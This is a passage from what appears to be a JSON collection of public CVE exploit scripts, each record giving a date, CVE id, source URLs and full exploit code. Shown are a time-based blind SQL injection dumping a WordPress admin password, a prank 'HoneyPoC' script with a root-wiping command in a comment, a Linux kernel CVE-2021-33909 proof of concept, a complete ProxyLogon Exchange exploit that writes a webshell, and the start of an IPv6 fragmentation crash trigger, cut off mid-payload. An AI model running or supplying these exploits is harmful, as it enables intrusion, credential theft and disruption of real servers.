1.13.3\n# Tested on: Ubuntu 18.04\n# CVE : CVE-2019-10866\n\nimport requests\nimport time\n\nsession = requests.Session()\ndictionary = '@._-$/\\\\\"£%&;§+*1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'\nflag = True\nusername = \"username\"\npassword = \"password\"\ntemp_password = \"\"\nTIME = 0.5\n\ndef login(username, password):\n payload = {\n 'log': username,\n 'pwd': password,\n 'wp-submit': 'Login',\n 'testcookie': 1\n }\n\ndef print_string(str):\n print \"\\033c\"\n print str\n\ndef get_admin_pass():\n len_pwd = 1\n global flag\n global temp_password\n while flag:\n flag = False\n ch_temp = ''\n for ch in dictionary:\n print_string(\"[*] Password dump: \" + temp_password + ch)\n ch_temp = ch\n start_time = time.time()\n r = session.get(url_vuln + ',(case+when+(select+ascii(substring(user_pass,' + str(len_pwd) + ',' + str(len_pwd) + '))+from+wp_users+where+id%3d1)%3d' + str(ord(ch)) + '+then+(select+sleep(' + str(TIME) + ')+from+wp_users+limit+1)+else+2+end)+asc%3b')\n elapsed_time = time.time() - start_time\n if elapsed_time >= TIME:\n flag = True\n break\n if flag:\n temp_password += ch_temp\n len_pwd += 1\n\nlogin(username, password)\nget_admin_pass()\nprint_string(\"[+] Password found: \" + temp_password)" - }, - { - "created_at": "2021-07-26T16:35:26Z", - "cve": "CVE-2021-22893", - "urls": [ - "https://github.com/ZephrFish/CVE-2021-22893" - ], - "exploit": "# CVE-2021-22893 RCE PoC\n# This is how dangerious not reading the source code is:\n# rm -rvf /* --no-preserve-root\n\nUSAGE=\"\nBash script to achieve RCE\nFlags:\n-c Target IP Address.\nusage: exploit.sh -c \nexample: exploit.sh -c 10.0.0.1\nexample: exploit.sh -l \nexample: exploit.sh -l ips.txt\n\"\nif [ $# -eq 0 ]; then\n echo \"$USAGE\"\n exit\nfi\necho \"HONEYPOC - NOT A REAL EXPLOIT\"\necho \"[!] Exploiting Host $1 $2\"\necho \"[+] Beginning Erasure of /\"\nsleep 5s\nls -aliRtu /\necho \"[!] Deleted Root File System.\"\nsleep 5s\necho \"We're no strangers to love\"\n# NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Spanish (NX)',\n# {\n# 'Ret' => 0x6fdbf727,\n# 'DisableNX' => 0x6fdc16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\necho \"You know the rules and so do I.\"\n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Finnish (NX)',\n# {\n# 'Ret' => 0x597df727,\n# 'DisableNX' => 0x597e16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 French (NX)',\n# {\n# 'Ret' => 0x595bf727,\n# 'DisableNX' => 0x595c16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n echo \"A full commitment's what I'm thinking of.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Hebrew (NX)',\n# {\n# 'Ret' => 0x5940f727,\n# 'DisableNX' => 0x594116e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Hungarian (NX)',\n# {\n# 'Ret' => 0x5970f727,\n# 'DisableNX' => 0x597116e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"You wouldn't get this from any other guy.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Italian (NX)',\n# {\n# 'Ret' => 0x596bf727,\n# 'DisableNX' => 0x596c16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Japanese (NX)',\n# {\n# 'Ret' => 0x567fd3be,\n# 'DisableNX' => 0x568016e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"I just wanna tell you how I'm feeling.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Korean (NX)',\n# {\n# 'Ret' => 0x6fd6f727,\n# 'DisableNX' => 0x6fd716e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Dutch (NX)',\n# {\n# 'Ret' => 0x596cf727,\n# 'DisableNX' => 0x596d16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Gotta make you understand\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Norwegian (NX)',\n# {\n# 'Ret' => 0x597cf727,\n# 'DisableNX' => 0x597d16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Polish (NX)',\n# {\n# 'Ret' => 0x5941f727,\n# 'DisableNX' => 0x594216e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna give you up.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Portuguese - Brazilian (NX)',\n# {\n# 'Ret' => 0x596ff727,\n# 'DisableNX' => 0x597016e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Portuguese (NX)',\n# {\n# 'Ret' => 0x596bf727,\n# 'DisableNX' => 0x596c16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna let you down.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Russian (NX)',\n# {\n# 'Ret' => 0x6fe1f727,\n# 'DisableNX' => 0x6fe216e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Swedish (NX)',\n# {\n# 'Ret' => 0x597af727,\n# 'DisableNX' => 0x597b16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna run around and desert you.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Turkish (NX)',\n# {\n# 'Ret' => 0x5a78f727,\n# 'DisableNX' => 0x5a7916e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Arabic (NX)',\n# {\n# 'Ret' => 0x6fd8f807,\n# 'DisableNX' => 0x6fd917c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna make you cry.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',\n# {\n# 'Ret' => 0x5860f807,\n# 'DisableNX' => 0x586117c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Chinese - Simplified (NX)',\n# {\n# 'Ret' => 0x58fbf807,\n# 'DisableNX' => 0x58fc17c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna say goodbye.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Chinese - Traditional (NX)',\n# {\n# 'Ret' => 0x5860f807,\n# 'DisableNX' => 0x586117c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Czech (NX)',\n# {\n# 'Ret' => 0x6fe1f807,\n# 'DisableNX' => 0x6fe217c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna tell a lie and hurt you.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Danish (NX)',\n# {\n# 'Ret' => 0x5978f807,\n# 'DisableNX' => 0x597917c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 German (NX)',\n# {\n# 'Ret' => 0x6fd9f807,\n# 'DisableNX' => 0x6fda17c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Greek (NX)',\n# {\n\n\necho \"[!] You should have read the source. HoneyPoC 3.0 - https://blog.zsec.uk/cve-2020-1350-honeypoc/\"" - }, - { - "created_at": "2021-07-26T16:59:10Z", - "cve": "CVE-2021-33909", - "urls": [ - "https://github.com/Liang2580/CVE-2021-33909" - ], - "exploit": "/*\n * CVE-2021-33909: size_t-to-int vulnerability in Linux's filesystem layer\n * Copyright (C) 2021 Qualys, Inc.\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. If not, see .\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#define PAGE_SIZE (4096)\n\n#define die() do { \\\n fprintf(stderr, \"died in %s: %u\\n\", __func__, __LINE__); \\\n exit(EXIT_FAILURE); \\\n} while (0)\n\nstatic void\nsend_recv_state(const int sock, const char * const sstate, const char rstate)\n{\n if (sstate) {\n if (send(sock, sstate, 1, MSG_NOSIGNAL) != 1) die();\n }\n if (rstate) {\n char state = 0;\n if (read(sock, &state, 1) != 1) die();\n if (state != rstate) die();\n }\n}\n\nstatic const char * bigdir;\nstatic char onedir[NAME_MAX + 1];\n\ntypedef struct {\n pid_t pid;\n int socks[2];\n size_t count;\n int delete;\n} t_userns;\n\nstatic int\nuserns_fn(void * const arg)\n{\n if (!arg) die();\n const t_userns * const userns = arg;\n const int sock = userns->socks[1];\n if (close(userns->socks[0])) die();\n\n send_recv_state(sock, NULL, 'A');\n\n size_t n;\n if (chdir(bigdir)) die();\n for (n = 0; n <= userns->count / (1 + (sizeof(onedir)-1) * 4); n++) {\n if (chdir(onedir)) die();\n }\n char device[] = \"./device.XXXXXX\";\n if (!mkdtemp(device)) die();\n char mpoint[] = \"/tmp/mpoint.XXXXXX\";\n if (!mkdtemp(mpoint)) die();\n if (mount(device, mpoint, NULL, MS_BIND, NULL)) die();\n\n if (userns->delete) {\n if (rmdir(device)) die();\n }\n if (chdir(\"/\")) die();\n\n send_recv_state(sock, \"B\", 'C');\n\n const int fd = open(\"/proc/self/mountinfo\", O_RDONLY);\n if (fd <= -1) die();\n static char buf[1UL << 20];\n size_t len = 0;\n for (;;) {\n ssize_t nbr = read(fd, buf, 1024);\n if (nbr <= 0) die();\n for (;;) {\n const char * nl = memchr(buf, '\\n', nbr);\n if (!nl) break;\n nl++;\n if (memmem(buf, nl - buf, \"\\\\134\", 4)) die();\n nbr -= nl - buf;\n memmove(buf, nl, nbr);\n len = 0;\n }\n len += nbr;\n if (memmem(buf, nbr, \"\\\\134\", 4)) break;\n }\n\n send_recv_state(sock, \"D\", 'E');\n die();\n}\n\nstatic void\nupdate_id_map(char * const mapping, const char * const map_file)\n{\n const size_t map_len = strlen(mapping);\n if (map_len >= SSIZE_MAX) die();\n if (map_len <= 0) die();\n\n size_t i;\n for (i = 0; i < map_len; i++) {\n if (mapping[i] == ',')\n mapping[i] = '\\n';\n }\n\n const int fd = open(map_file, O_WRONLY);\n if (fd <= -1) die();\n if (write(fd, mapping, map_len) != (ssize_t)map_len) die();\n if (close(fd)) die();\n}\n\nstatic void\nproc_setgroups_write(const pid_t child_pid, const char * const str)\n{\n const size_t str_len = strlen(str);\n if (str_len >= SSIZE_MAX) die();\n if (str_len <= 0) die();\n\n char setgroups_path[64];\n snprintf(setgroups_path, sizeof(setgroups_path), \"/proc/%ld/setgroups\", (long)child_pid);\n\n const int fd = open(setgroups_path, O_WRONLY);\n if (fd <= -1) {\n if (fd != -1) die();\n if (errno != ENOENT) die();\n return;\n }\n if (write(fd, str, str_len) != (ssize_t)str_len) die();\n if (close(fd)) die();\n}\n\nstatic void\nfork_userns(t_userns * const userns, const size_t size, const int delete)\n{\n static const size_t stack_size = (1UL << 20) + 2 * PAGE_SIZE;\n static char * stack = NULL;\n if (!stack) {\n stack = mmap(NULL, stack_size, PROT_NONE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);\n if (!stack || stack == MAP_FAILED) die();\n if (mprotect(stack + PAGE_SIZE, stack_size - 2 * PAGE_SIZE, PROT_READ | PROT_WRITE)) die();\n }\n\n if (!userns) die();\n userns->count = size / 2;\n userns->delete = delete;\n\n if (socketpair(AF_UNIX, SOCK_STREAM, 0, userns->socks)) die();\n userns->pid = clone(userns_fn, stack + stack_size - PAGE_SIZE, CLONE_NEWUSER | CLONE_NEWNS | SIGCHLD, userns);\n if (userns->pid <= -1) die();\n if (close(userns->socks[1])) die();\n userns->socks[1] = -1;\n\n char map_path[64], map_buf[64];\n snprintf(map_path, sizeof(map_path), \"/proc/%ld/uid_map\", (long)userns->pid);\n snprintf(map_buf, sizeof(map_buf), \"0 %ld 1\", (long)getuid());\n update_id_map(map_buf, map_path);\n\n proc_setgroups_write(userns->pid, \"deny\");\n snprintf(map_path, sizeof(map_path), \"/proc/%ld/gid_map\", (long)userns->pid);\n snprintf(map_buf, sizeof(map_buf), \"0 %ld 1\", (long)getgid());\n update_id_map(map_buf, map_path);\n\n send_recv_state(*userns->socks, \"A\", 'B');\n}\n\nstatic void\nwait_userns(t_userns * const userns)\n{\n if (!userns) die();\n if (kill(userns->pid, SIGKILL)) die();\n\n int status = 0;\n if (waitpid(userns->pid, &status, 0) != userns->pid) die();\n userns->pid = -1;\n if (!WIFSIGNALED(status)) die();\n if (WTERMSIG(status) != SIGKILL) die();\n\n if (close(*userns->socks)) die();\n *userns->socks = -1;\n}\n\nint\nmain(const int argc, const char * const argv[])\n{\n if (argc != 2) die();\n bigdir = argv[1];\n if (*bigdir != '/') die();\n\n if (sizeof(onedir) != 256) die();\n memset(onedir, '\\\\', sizeof(onedir)-1);\n if (onedir[sizeof(onedir)-1] != '\\0') die();\n\n puts(\"creating directories, please wait...\");\n if (mkdir(bigdir, S_IRWXU) && errno != EEXIST) die();\n if (chdir(bigdir)) die();\n size_t i;\n for (i = 0; i <= (1UL << 30) / (1 + (sizeof(onedir)-1) * 4); i++) {\n if (mkdir(onedir, S_IRWXU) && errno != EEXIST) die();\n if (chdir(onedir)) die();\n }\n if (chdir(\"/\")) die();\n\n static t_userns userns;\n fork_userns(&userns, (1UL << 31), 1);\n puts(\"crashing...\");\n send_recv_state(*userns.socks, \"C\", 'D');\n wait_userns(&userns);\n die();\n}" - }, - { - "created_at": "2021-07-26T17:20:40Z", - "cve": "CVE-2021-27065", - "urls": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065", - "https://github.com/p0wershe11/ProxyLogon" - ], - "exploit": "# -*- encoding: utf-8 -*-\n'''\n-------------------------------------------------------\n@File : ProxyLogon.py\n@Time : 2021/03/13 21:13:01\n@Version : 1.0.0\n@License : \n@Desc : \n@Author : p0wershe11, RGDZ\n-------------------------------------------------------\n'''\n\n\n\nfrom random import Random, randint, random\nimport re\nimport string\nimport sys\nimport json\nimport requests\nfrom urllib.parse import urlencode\nfrom struct import unpack\nfrom base64 import b64encode, b64decode\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n\nclass IOFlow(str):\n\n def __init__(self) -> None:\n super().__init__()\n self._cout = sys.stdout\n\n def _write(self, s:str):\n self.cout.write(s)\n\n def __lshift__(self, s: str)->int:\n return self._cout.write(s)\n\nendl = \"\\n\"\ncout = IOFlow()\n\nclass Color:\n START = \"\\033[\"\n END = START+\"0m\"\n \n\n C_RED = START+\"31m\"\n C_GREEN = START+\"32m\"\n C_YELLOW = START+\"33m\"\n C_BLUE = START+\"34m\"\n\n # RANDOM_COLOR = random.choice()\n\nclass Color(Color):\n ALL_COLOR = {k:v for k, v in Color.__dict__.items() if \"C_\" in k}\n _COLOR_S = lambda color, s: color+s+Color.END\n\nclass Color(Color):\n\n RED_S = lambda s: Color._COLOR_S(Color.C_RED, s)\n GREEN_S = lambda s: Color._COLOR_S(Color.C_GREEN, s)\n YELLOW_S = lambda s: Color._COLOR_S(Color.C_YELLOW, s)\n BLUE_S = lambda s: Color._COLOR_S(Color.C_BLUE, s)\n\nclass Log:\n BASE_SYM = lambda sym: f\"{sym}\"\n TEMPLATE = lambda sym, msg: cout << f\"{sym}:{msg}\\n\"\n\nclass Log(Log):\n INFO_SYM = Log.BASE_SYM(Color.BLUE_S(\"[*]\"))\n WARING_SYM = Log.BASE_SYM(Color.YELLOW_S(\"[!]\"))\n SUCCESS_SYM = Log.BASE_SYM(Color.GREEN_S(\"[+]\"))\n\nclass Log(Log):\n info = lambda msg: Log.TEMPLATE(Log.INFO_SYM, msg)\n waring = lambda msg: Log.TEMPLATE(Log.WARING_SYM, msg)\n success = lambda msg: Log.TEMPLATE(Log.SUCCESS_SYM, msg)\n\n\nARGS = [dict(v) for v in [zip(v.split(\"=\")[0::2], v.split(\"=\")[1::2]) for v in sys.argv[1:]]]\n\n\ncheck_argv = lambda arg: arg in sys.argv\n\n\n\nHOST = \"\"\nMAIL = \"\"\nMAILS = \"\"\nLOCAL_NAME = \"\"\n\nascii_letters = string.ascii_letters\nSHELL_NAME = \"\".join(ascii_letters[randint(0, len(ascii_letters)-1)] for i in range(10))\nFILE_PATH = f'C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\{SHELL_NAME}.aspx'\nFILE_DATA = ''\n\n\ndef _unpack_str(byte_string):\n return byte_string.decode('UTF-8').replace('\\x00', '')\n\ndef _unpack_int(format, data):\n return unpack(format, data)[0]\n\n\ndef exploit(path, qs='', data='', cookies=[], headers={}):\n global HOST, LOCAL_NAME\n\n cookies = list(cookies)\n cookies.extend([f\"X-BEResource=a]@{LOCAL_NAME}:444{path}?{qs}#~1941962753\"])\n if not headers:\n headers = {\n 'Content-Type': 'application/json'\n }\n headers['Cookie'] = ';'.join(cookies)\n headers['msExchLogonMailbox'] = 'S-1-5-20'\n\n url = f\"https://{HOST}/ecp/y.js\"\n resp = requests.post(url, headers=headers, data=data, verify=False, allow_redirects=False)\n return resp\n\ndef parse_challenge(auth):\n target_info_field = auth[40:48]\n target_info_len = _unpack_int('H', target_info_field[0:2])\n target_info_offset = _unpack_int('I', target_info_field[4:8])\n\n target_info_bytes = auth[target_info_offset:target_info_offset+target_info_len]\n\n domain_name = ''\n computer_name = ''\n info_offset = 0\n while info_offset < len(target_info_bytes):\n av_id = _unpack_int('H', target_info_bytes[info_offset:info_offset+2])\n av_len = _unpack_int('H', target_info_bytes[info_offset+2:info_offset+4])\n av_value = target_info_bytes[info_offset+4:info_offset+4+av_len]\n\n info_offset = info_offset + 4 + av_len\n if av_id == 2: # MsvAvDnsDomainName\n domain_name = _unpack_str(av_value)\n elif av_id == 3: # MsvAvDnsComputerName\n computer_name = _unpack_str(av_value)\n return domain_name, computer_name\n\ndef get_local_name():\n global LOCAL_NAME\n Log.info(\"Getting ComputerName and DomainName.\")\n ntlm_type1 = (\n b'NTLMSSP\\x00' # NTLMSSp Signature\n b'\\x01\\x00\\x00\\x00' # Message Type\n b'\\x97\\x82\\x08\\xe2' # Flags\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' # Domain String\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' # Workstation String\n b'\\x0a\\x00\\xba\\x47\\x00\\x00\\x00\\x0f' # OS Version\n )\n headers = {\n 'Authorization': f'Negotiate {b64encode(ntlm_type1).decode()}'\n }\n # print(headers)\n # assert False\n r = requests.get(f'https://{HOST}/rpc/', headers=headers, verify=False)\n assert r.status_code == 401, \"Error while getting ComputerName\"\n auth_header = r.headers['WWW-Authenticate']\n auth = re.search('Negotiate ([A-Za-z0-9/+=]+)', auth_header).group(1)\n domain_name, computer_name = parse_challenge(b64decode(auth))\n if not domain_name:\n Log.waring(\"DomainName not found.\")\n return exit(0)\n if not computer_name:\n Log.waring(\"ComputerName not found\")\n return exit(0)\n Log.info(f\"Domain Name = {domain_name}\")\n Log.info(f\"Computer Name = {computer_name}\")\n LOCAL_NAME = computer_name\n\n\ndef get_sid(mail):\n payload = f'''\n\n \n {mail}\n http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\n \n\n'''\n headers = {\n 'User-Agent': 'ExchangeServicesClient/0.0.0.0', \n 'Content-Type': 'text/xml'\n }\n resp = exploit('/autodiscover/autodiscover.xml', qs='', data=payload, headers=headers)\n res = re.search('(.*?)', resp.text)\n if not res:\n Log.waring(\"LegacyDN not found!\")\n return\n\n headers = {\n 'X-Clientapplication': 'Outlook/15.0.4815.1002', \n 'X-Requestid': 'x', \n 'X-Requesttype': 'Connect', \n 'Content-Type': 'application/mapi-http', \n }\n legacyDN = res.group(1)\n payload = legacyDN + '\\x00\\x00\\x00\\x00\\x00\\x20\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00'\n r = exploit('/mapi/emsmdb/', qs='', data=payload, headers=headers)\n result = re.search('with SID ([S\\-0-9]+) ', r.text)\n if not result:\n Log.waring(f\"Not Found user: {mail}\")\n return None\n sid = result.group(1)\n Log.info(f\"sid:{sid}\")\n if \"500\" not in sid.split(\"-\"):\n Log.waring(\"500 not in sid.\")\n sid = \"-\".join(sid.split(\"-\")[:-1]+[\"500\"])\n Log.info(f\"add -500, sid:{sid}\")\n return sid\n\n \n\n\ndef exp(mail_name, sid):\n payload = f'{sid}'\n resp = exploit('/ecp/proxyLogon.ecp', qs='', data=payload)\n Log.waring(f\"Login status code:{resp.status_code}\")\n\n session_id = resp.cookies.get('ASP.NET_SessionId')\n canary = resp.cookies.get('msExchEcpCanary')\n Log.info(f'get ASP.NET_SessionId = {session_id}')\n Log.info(f\"get msExchEcpCanary = {canary}\")\n \n extra_cookies = [\n 'ASP.NET_SessionId='+session_id, \n 'msExchEcpCanary='+canary\n ]\n qs = urlencode({\n 'schema': 'OABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n r = exploit('/ecp/DDI/DDIService.svc/GetObject', qs=qs, data='', cookies=extra_cookies)\n identity = r.json()['d']['Output'][0]['Identity']\n Log.info(f\"OAB Name = f{identity['DisplayName']}\")\n Log.info(f\"OAB ID = {identity['RawIdentity']}\")\n\n # Set-OABVirtualDirectory\n Log.info(\"Setting up webshell payload through OAB\")\n qs = urlencode({\n 'schema': 'OABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n payload = json.dumps({\n 'identity': {\n '__type': 'Identity:ECP', \n 'DisplayName': identity['DisplayName'], \n 'RawIdentity': identity['RawIdentity']\n }, \n 'properties': {\n 'Parameters': {\n '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \n 'ExternalUrl': 'http://f/' + FILE_DATA\n }\n }\n })\n r = exploit('/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies)\n assert r.status_code == 200, 'Error while setting up webshell payload'\n Log.success(\"Setting up webshell payload OK!\")\n\n # save file\n Log.info(\"Writing shell...\")\n qs = urlencode({\n 'schema': 'ResetOABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n payload = json.dumps({\n 'identity': {\n '__type': 'Identity:ECP', \n 'DisplayName': identity['DisplayName'], \n 'RawIdentity': identity['RawIdentity']\n }, \n 'properties': {\n 'Parameters': {\n '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \n 'FilePathName': FILE_PATH\n }\n }\n })\n resp = exploit('/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies)\n if resp.status_code != 200:\n Log.waring(f\"Error while writing shell, status code is {resp.status_code}\")\n return\n\n\n Log.info(\"Cleaning OAB...\")\n qs = urlencode({\n 'schema': 'OABVirtualDirectory', \n 'msExchEcpCanary': canary\n })\n payload = json.dumps({\n 'identity': {\n '__type': 'Identity:ECP', \n 'DisplayName': identity['DisplayName'], \n 'RawIdentity': identity['RawIdentity']\n }, \n 'properties': {\n 'Parameters': {\n '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \n 'ExternalUrl': ''\n }\n }\n })\n resp = exploit('/ecp/DDI/DDIService.svc/SetObject', qs=qs, data=payload, cookies=extra_cookies)\n Log.info(f\"resp:{resp.status_code}\")\n Log.success(f\"shell: https://{HOST}/aspnet_client/{SHELL_NAME}.aspx\")\n\n\n\ndef run(runner):\n global HOST, MAILS\n f = open(MAILS)\n try:\n while True:\n mail = next(f)[:-1]\n return runner(mail)\n except:\n Log.waring(\"mails file has been read.\")\n\ndef runner(mail):\n get_local_name()\n sid = get_sid(mail)\n if not sid:\n return\n return exp(mail.split('@')[0], sid)\n\ndef main():\n global HOST, MAILS, MAIL, ARGS\n args = {}\n for v in ARGS:\n args.update(v)\n\n HOST = args.get(\"--host\")\n if not HOST:\n return help()\n \n MAIL=args.get(\"--mail\")\n if MAIL:\n return runner(MAIL)\n\n MAILS=args.get(\"--mails\")\n if MAILS:\n return run(runner)\n\ndef help():\n cout << f\"\"\"usage:\n python {__file__} --host=exchange.com --mail=admin@exchange.com\n python {__file__} --host=exchange.com --mails=./mails.txt\nargs:\n --host: target's address.\n --mail: exists user's mail.\n --mails: mails file.\n \"\"\"\n cout << endl\n\ndef Logo():\n return ''' \n=============================================================\n \n ___ _ \n| . \\ _ _ ___ __ _ _ | | ___ ___ ___ ._ _ \n| _/| '_>/ . \\\\ \/| | || |_ / . \/ . |/ . \\| ' |\n|_| |_| \\___//\\_\\`_. ||___|\\___/\\_. |\\___/|_|_|\n <___' <___' \n\n author: p0wershe11,RGDZ\n=============================================================\n'''\n\n\nif __name__ == \"__main__\":\n cout << Logo()\n main()" - }, - { - "created_at": "2021-07-26T17:22:12Z", - "cve": "CVE-2021-24086", - "urls": [ - "https://github.com/0vercl0k/CVE-2021-24086" - ], - "exploit": "# Axel '0vercl0k' Souchet - April 7 2021\nfrom scapy.all import *\nimport argparse\n\ndef frag6(target, frag_id, bytes, nh, frag_size = 1008):\n '''Ghetto fragmentation.'''\n assert (frag_size % 8) == 0\n leftover = bytes\n offset = 0\n frags = []\n while len(leftover) > 0:\n chunk = leftover[: frag_size]\n leftover = leftover[len(chunk): ]\n last_pkt = len(leftover) == 0\n # 0 -> No more / 1 -> More\n m = 0 if last_pkt else 1\n assert offset < 8191\n pkt = Ether() \\\n / IPv6(dst = target) \\\n / IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \\\n / chunk\n\n offset += (len(chunk) // 8)\n frags.append(pkt)\n return frags\n\ndef pull_the_trigger(args):\n '''Trigger CVE-2021-24086 patched in REL2102.'''\n frag_id = random.randint(0, 0xffffffff)\n second_pkt_id = (~frag_id & 0xffffffff)\n reassembled_pkt = IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n 